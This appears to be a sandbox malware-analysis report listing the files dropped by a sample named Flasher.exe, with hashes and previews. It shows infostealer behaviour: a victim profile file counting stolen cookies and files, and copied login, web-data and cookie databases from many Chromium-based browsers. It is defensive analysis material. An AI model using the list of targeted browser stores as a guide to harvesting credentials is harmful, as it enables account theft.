Preview:	PK.........Y.*.M............DTBZGIOOSO.docxDTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXD

C:\Users\user\AppData\Local\Temp\5bNHSIe7QwCmVq5h9ISRvSOeTigAH4\user_info.txt

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	Unicode text, UTF-8 text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	548
Entropy (8bit):	5.305841157444733
Encrypted:	false
SSDEEP:	12:eM3lxmRQN3oi238Q8Fxx6YFSrJFVucOlQM7NlVrPBQM3aWfgHdAej01/kq:eQNNYv383xxVuD/M7NlVrPe8GAejU/kq
MD5:	B613BE31E8993E67982984CA38B35F3F
SHA1:	2A6C175073FEFB4F39D4E4444B8297FA484E3BA8
SHA-256:	50389921CC955A4AC0D6B21C2DB479562F7B656C357D30E54DA2E3EC30666E81
SHA-512:	50CCB7BA811A001E1573F9F82BE154F3119E933A8FE99E7EBDBDE15CFAD33BA2ED05444DF102BF4F91AA64B41F5152E737343A9DF22014C6F1A732530CA97A33
Malicious:	false
Reputation:	low
Preview:	..- IP Info -....IP: 8.46.123.189..Country: United States..City: New York..Postal: 10000..ISP: Level - A3356..Timezone: -05:00....- PC Info -....OS: Microsoft Windows 10 Pro..CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..GPU: .. - YT3TY (1280, 1024)..HWID: 5676401068884178..Current Language: English (United States)..FileLocation: C:\Users\user\Desktop\Flasher.exe..Is Elevated: true....- Other Info -....Antivirus: .. - Windows Defender....- Log Info -....Passwords: ....Cookies: . 25...Wallets: ....Files: . 18...Credit Cards: ..

C:\Users\user\AppData\Local\Temp\7star_default_login_data

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ll2zqwp.k5f.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_colef2rh.bkg.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\amigo_default_login_data

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\bravesoftware_default_login_data

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\bravesoftware_default_webdata

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\bravesoftware_network_cookies

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\browser_default_login_data

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\browser_default_webdata

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\browser_network_cookies

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\chedot_default_login_data

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\chromeplus_default_login_data

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\chromium_default_login_data

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\citrio_default_login_data

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\coccoc_default_login_data

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\comodo_default_login_data

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\comodo_default_webdata

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\comodo_network_cookies

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\coowoo_default_login_data

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\coowoo_default_webdata

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\coowoo_network_cookies

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\elements browser_default_login_data

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\google_default_login_data

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\google_default_webdata

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\google_network_cookies

Download File

Process:	C:\Users\user\Desktop\Flasher.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
